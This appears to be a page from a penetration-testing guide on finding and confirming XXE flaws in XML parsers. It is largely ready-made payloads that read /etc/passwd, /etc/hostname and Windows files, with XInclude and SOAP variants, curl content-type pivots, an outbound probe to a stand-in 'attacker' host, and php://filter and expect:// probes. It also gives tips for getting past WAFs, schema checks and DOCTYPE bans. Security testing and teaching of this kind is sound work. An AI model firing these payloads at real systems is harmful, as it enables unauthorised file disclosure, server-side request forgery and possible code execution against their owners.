Identifying
Three-step identification: find an XML input surface, confirm the parser resolves entities, then test external-entity resolution. The proof-of-life probe is a benign internal entity reflected in the response:
# Step 1 - Spot XML by Content-Type, request body, or document-format upload
# Step 2 - Reflection probe (does the parser resolve entities at all?)<!DOCTYPE foo [<!ENTITY test "PROOF_OF_LIFE">]><root><name>&test;</name></root># → If response contains "PROOF_OF_LIFE" where the entity was, internal entities resolve
# Step 3 - External-entity probe<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><root><name>&xxe;</name></root># → If response contains the hostname, XXE is fully exploitable
# Step 4 - Content-Type pivot for JSON-by-default APIscurl -X POST -H 'Content-Type: application/xml' --data '<...>' http://target/apiSuccess indicator: a value you put in an entity declaration appears in the rendered response. Once that happens, file disclosure is straightforward.
Finding the XML surface
Section titled “Finding the XML surface”Direct indicators
Section titled “Direct indicators”Watch for these in HTTP traffic:
| Indicator | Where |
|---|---|
Content-Type: application/xml | Request or response header |
Content-Type: text/xml | Older convention; same meaning |
Content-Type: application/soap+xml | SOAP API |
SOAPAction: header | SOAP API |
<?xml version="1.0" ...?> | First bytes of request/response body |
xmlns= attributes | XML namespace declarations in body |
multipart/related with XML parts | SOAP-with-attachments, SAML, WSDL responses |
File-upload XML surfaces
Section titled “File-upload XML surfaces”Many file formats are XML under the hood:
| Format | Notes |
|---|---|
| SVG | Pure XML; any image-processing pipeline that “renders” SVG server-side parses it as XML |
XML Office formats (.docx, .xlsx, .pptx) | ZIP archives containing word/document.xml, xl/workbook.xml, etc. Server-side text extractors and converters often parse these |
ODF formats (.odt, .ods, .odp) | Same - ZIP of XML |
| EPUB | ZIP of XML |
XML-based subtitle formats (.ttml, .dfxp) | Subtitle processors |
| GPX, KML | GPS / map data formats |
| PDF metadata / XMP | PDF embeds XML metadata; some PDF parsers eval it |
The SVG upload case is the highest-yield because SVG uploads are commonly accepted (profile pictures, document logos) and many imagemagick / librsvg / batik pipelines historically parsed XML with external entities enabled. See Limited uploads for the upload-side details.
JSON-to-XML content-negotiation pivot
Section titled “JSON-to-XML content-negotiation pivot”Many “JSON APIs” accept XML as well, depending on the framework. The pattern:
Server reads Content-Type → decides how to parse bodyIf the framework supports content negotiation (Spring, ASP.NET, some Flask configs, some Express plugins), sending the same logical request body but with Content-Type: application/xml may switch the parser. Try:
# Original JSON request$ curl -X POST -H 'Content-Type: application/json' \ -d '{"id": 1, "name": "test"}' \ http://target/api/items
# Same logical content, XML-encoded$ curl -X POST -H 'Content-Type: application/xml' \ --data-binary @- http://target/api/items <<'EOF'<?xml version="1.0" encoding="UTF-8"?><request> <id>1</id> <name>test</name></request>EOFA 200 response (or any non-415-Unsupported-Media-Type) means the server is processing the XML body. Now the XXE probe applies.
Online converters like json-to-xml or jq -r with a small wrapper can turn complex JSON bodies into XML quickly for testing.
GraphQL-to-XML
Section titled “GraphQL-to-XML”Some GraphQL endpoints support XML responses or XML mutation bodies via custom transports. Rare but worth probing if the engagement features a GraphQL endpoint that’s otherwise well-defended.
Hidden XML inside document submissions
Section titled “Hidden XML inside document submissions”A common pattern: a form accepts user input via JSON, but one field is “advanced settings as XML” that the back-end concatenates into a larger XML document and parses. Look for fields named metadata, config, xml, settings, advanced, or any free-form text field that gets stored alongside structured fields.
The reflection probe - step 1
Section titled “The reflection probe - step 1”Before testing external entities (which may be partially defended), confirm the parser resolves internal entities. This tests “does the XML parser process entity declarations at all”:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY test "PROOF_OF_LIFE">]><root> <name>&test;</name></root>Three possible responses:
- Response contains “PROOF_OF_LIFE” where
&test;was. The parser resolves entities. Move to step 2. - Response contains the literal string
&test;. Entity resolution disabled at the application layer (the XML was treated as text). XXE probably won’t work here. - Error / 500 / parse error. The DTD or entity declaration tripped strict-XML mode. Try variations:
- Move the entity into the existing DOCTYPE if there is one
- Use a different XML version or encoding declaration
- Try without the
<?xml ...?>declaration
The “PROOF_OF_LIFE” string can be anything - pick something obviously not in the app’s normal data so search-and-confirm is easy.
Finding which field reflects
Section titled “Finding which field reflects”In a multi-field XML body, the entity reference has to go in a field that the application reads and renders back. Some fields are written to DB only and never echoed; those don’t help for response-reflection XXE.
Strategy: send a baseline request and note which submitted values appear in the response. The fields that come back are candidate injection points. Often:
name,title,subject- usually reflected (forms common, contact pages)email,phone- usually reflected (form validation echo)message,body,notes- sometimes reflected (preview functionality)id,uuid- sometimes reflected (success message confirms ID)
If no field reflects, see Blind exfil for the OOB approach.
The external-entity probe - step 2
Section titled “The external-entity probe - step 2”Once entity resolution is confirmed, test if external entities work:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hostname">]><root> <name>&xxe;</name></root>Targets to probe in order (each tests a different parser capability):
| Probe | Tests |
|---|---|
file:///etc/hostname | Local file read on Linux; tiny, low-noise |
file:///c:/windows/win.ini | Local file read on Windows |
http://attacker:8000/ | Outbound HTTP (proves SSRF) |
http://127.0.0.1:80/ | Localhost HTTP (also SSRF; sometimes only this works due to egress controls) |
php://filter/convert.base64-encode/resource=/etc/passwd | PHP-specific filter (only works on PHP) |
expect://id | PHP expect:// (rare; if works → RCE) |
For each, observe whether the entity content appears in the response. The minimum useful confirmation is one file read.
What “file read” responses look like
Section titled “What “file read” responses look like”For file:///etc/passwd:
<message>root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologin...</message>The full file content appears where the entity was referenced. If only part appears, the parser may be truncating at special characters (XML doesn’t allow certain bytes in entity content). See File disclosure for the workarounds (CDATA, php://filter/convert.base64-encode/).
What “parser blocked” responses look like
Section titled “What “parser blocked” responses look like”| Symptom | Likely cause |
|---|---|
| Response empty where entity was | Parser resolved entity to null (file not readable, or external entities disabled) |
| 500 Internal Server Error | Parser error - could be permissions, missing file, or strict-XML rejecting the DOCTYPE |
| Response unchanged (entity name appears verbatim) | Parser doesn’t resolve entities at all, or app strips DOCTYPE before parsing |
| 400 / 415 | Application rejects the body - wrong Content-Type, schema validation, etc. |
For 500 errors, include the probe even if you get errors - the error message itself sometimes leaks useful information (file paths, parser library names, stack traces). See Blind exfil for error-based exploitation.
A worked identification walkthrough
Section titled “A worked identification walkthrough”A “Contact Us” form submits this XML:
<?xml version="1.0" encoding="UTF-8"?><root> <name>John</name> <tel>555-1234</tel> <message>Hello</message></root>Response:
<h2>Thanks John, we received your message</h2>Observations:
<name>is reflected as “John” → injection point candidate 1<email>is reflected → injection point candidate 2<tel>and<message>don’t seem to appear in the visible response - could be DB-only
Step 1 - Reflection probe on <name>
Section titled “Step 1 - Reflection probe on <name>”<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY test "PROOF_OF_LIFE">]><root> <name>&test;</name> <tel>555-1234</tel> <message>Hello</message></root>Response:
<h2>Thanks PROOF_OF_LIFE, we received your message</h2>✓ Internal entities resolve. Move to external.
Step 2 - External-entity probe
Section titled “Step 2 - External-entity probe”<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hostname">]><root> <name>&xxe;</name> <tel>555-1234</tel> <message>Hello</message></root>Response:
<h2>Thanks web-server-prod-01, we received your message</h2>✓ External entities resolve. XXE is confirmed. Move on to File disclosure.
Edge cases
Section titled “Edge cases”XML response, plain-text request
Section titled “XML response, plain-text request”Some APIs accept JSON requests but return XML responses. The response is server-generated and not an attack surface. The request body is what matters - if it accepts XML, you’re in.
DTD-not-permitted strictness
Section titled “DTD-not-permitted strictness”Some parsers reject any DOCTYPE in the input as a defense (“DOCTYPE declarations not allowed”). Two paths:
- No DOCTYPE - try declaring entities inline if the parser supports it (rare).
- Find a different XML parser - if there’s an alternate endpoint (e.g., a
/v1/vs/v2/of the API, or a different content-type that routes to a different parser), one of them may have looser config.
XInclude
Section titled “XInclude”XInclude is a separate XML feature (<xi:include href="..."/>) that imports another XML file’s content into the current document. When DOCTYPE is rejected but XInclude isn’t:
<?xml version="1.0"?><root xmlns:xi="http://www.w3.org/2001/XInclude"> <name><xi:include href="file:///etc/passwd" parse="text"/></name></root>Achieves the same file-read primitive without needing an entity declaration. Worth trying when DOCTYPE is blocked.
SOAP-wrapped XML
Section titled “SOAP-wrapped XML”SOAP envelopes have their own structure but the XXE inside the body works the same:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <getUser> <username>&xxe;</username> </getUser> </soap:Body></soap:Envelope>The DOCTYPE goes outside the SOAP envelope. The entity is referenced inside it. Most SOAP parsers honor entities the same way as raw XML parsers.
XML schema validation (XSD) as defense
Section titled “XML schema validation (XSD) as defense”Some apps validate input XML against a schema (XSD). The schema can restrict which elements are allowed, which might block your DOCTYPE addition. Bypasses:
- Submit XSD-conforming structure but add entities - the schema validates structure, not entity use. Add
<!ENTITY xxe ...>and reference it where the schema allows string content. - Look for alternate endpoints without schema validation - admin APIs and legacy endpoints often lack it.
Defensive smells to ignore (or test anyway)
Section titled “Defensive smells to ignore (or test anyway)”When the app looks “defended,” test these specific patterns to find weaknesses:
| Apparent defense | Why it may not work |
|---|---|
Content-Type: application/json enforced | Try application/xml, text/xml, multipart with XML part |
| ”XXE prevention header” / WAF | Look for path variations (/api/v1/ vs /api/v2/); WAFs commonly rate-limit by path |
| DOCTYPE not allowed | Try XInclude; try DTD via parameter entity from external |
| External entities disabled at parser | But parameter entities sometimes still work; see blind-exfil |
| Application converts XML to JSON server-side | The conversion step itself often parses XML - XXE happens before the conversion |
Quick reference
Section titled “Quick reference”| Task | Pattern |
|---|---|
| Spot XML surface | Content-Type: application/xml/text/xml/soap+xml; <?xml ...?> in body |
| Pivot from JSON | -H 'Content-Type: application/xml' with XML-converted body |
| Reflection probe | <!DOCTYPE root [<!ENTITY test "PROOF">]> ... &test; |
| External-entity probe | <!ENTITY xxe SYSTEM "file:///etc/hostname"> ... &xxe; |
| Linux file targets | /etc/hostname, /etc/passwd, /etc/hosts, /proc/self/environ |
| Windows file targets | c:/windows/win.ini, c:/boot.ini, c:/inetpub/logs/... |
| HTTP outbound probe | <!ENTITY x SYSTEM "http://attacker:8000/"> |
| PHP filter probe | <!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> |
| XInclude (DOCTYPE blocked) | <xi:include href="file:///..." parse="text"/> (with xmlns:xi="http://www.w3.org/2001/XInclude") |
| SOAP-wrapped XXE | DOCTYPE outside <soap:Envelope>; reference entity inside |
| Document-format pivot | Upload SVG / DOCX / XLSX with embedded XXE payload |
| If no reflection | See Blind exfil for OOB exfil |